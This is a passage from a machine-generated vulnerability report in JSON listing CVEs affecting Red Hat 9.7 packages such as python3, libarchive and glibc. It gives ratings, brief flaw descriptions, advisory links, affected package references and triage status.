          "url": "https://access.redhat.com/errata/RHSA-2026:10950"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4224"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/8/ALSA-2026-10950.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:10950"
        },
        {
          "url": "https://github.com/python/cpython/commit/196edfb06a7458377d4d0f4b3cd41724c1f3bd4a"
        },
        {
          "url": "https://github.com/python/cpython/commit/642865ddf4b232da1f3b1f7abcfa3254c4bfe785"
        },
        {
          "url": "https://github.com/python/cpython/commit/af856a7177326ac25d9f66cc6dd28b554d914fee"
        },
        {
          "url": "https://github.com/python/cpython/commit/e0a8a6da90597a924b300debe045cdb4628ee1f3"
        },
        {
          "url": "https://github.com/python/cpython/commit/eb0e8be3a7e11b87d198a2c3af1ed0eccf532768"
        },
        {
          "url": "https://github.com/python/cpython/issues/145986"
        },
        {
          "url": "https://github.com/python/cpython/pull/145987"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-4224.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-10950.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/5M7CGUW3XBRY7II4DK43KF7NQQ3TPZ6R/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4224"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4224"
        }
      ],
      "published": "2026-03-16T18:16:10+00:00",
      "updated": "2026-04-08T13:16:41+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-4424",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "A flaw was found in libarchive. This heap out-of-bounds read vulnerability exists in the RAR archive processing logic due to improper validation of the LZSS sliding window size after transitions between compression methods. A remote attacker can exploit this by providing a specially crafted RAR archive, leading to the disclosure of sensitive heap memory information without requiring authentication or user interaction.",
      "recommendation": "Upgrade libarchive to version 3.5.3-9.el9_7",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4424"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10065"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10097"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:11768"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:12071"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:12274"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:13812"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:14937"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:16174"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8492"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8510"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8517"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8521"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8534"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8864"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8865"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8866"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8867"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8873"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8908"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8944"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:9026"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:9592"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:9832"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4424"
        },
        {
          "url": "https://bugzilla.redhat.com/2449006"
        },
        {
          "url": "https://bugzilla.redhat.com/2452945"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449006"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452945"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4424"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5121"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-8510.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:8510"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2898"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-4424.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-8534.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4424"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4424"
        }
      ],
      "published": "2026-03-19T15:16:28+00:00",
      "updated": "2026-05-12T10:16:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.5.3-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-4426",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        1335
      ],
      "description": "A flaw was found in libarchive. An Undefined Behavior vulnerability exists in the zisofs decompression logic, caused by improper validation of a field (`pz_log2_bs`) read from ISO9660 Rock Ridge extensions. A remote attacker can exploit this by supplying a specially crafted ISO file. This can lead to incorrect memory allocation and potential application crashes, resulting in a denial-of-service (DoS) condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4426"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8944"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4426"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449010"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2897"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4426"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4426"
        }
      ],
      "published": "2026-03-19T15:16:28+00:00",
      "updated": "2026-05-03T21:16:11+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.5.3-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-4437",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "Calling gethostbyaddr or gethostbyaddr_r with a configured nsswitch.conf that specifies the library's DNS backend in the GNU C Library version 2.34 to version 2.43 could, with a crafted response from the configured DNS server, result in a violation of the DNS specification that causes the application to treat a non-answer section of the DNS response as a valid answer.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4437"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4437"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4437"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=34014"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4437"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/03/23/2"
        }
      ],
      "published": "2026-03-20T20:16:49+00:00",
      "updated": "2026-04-07T18:41:36+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.34-231.el9_7.10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.34-231.el9_7.10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.34-231.el9_7.10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
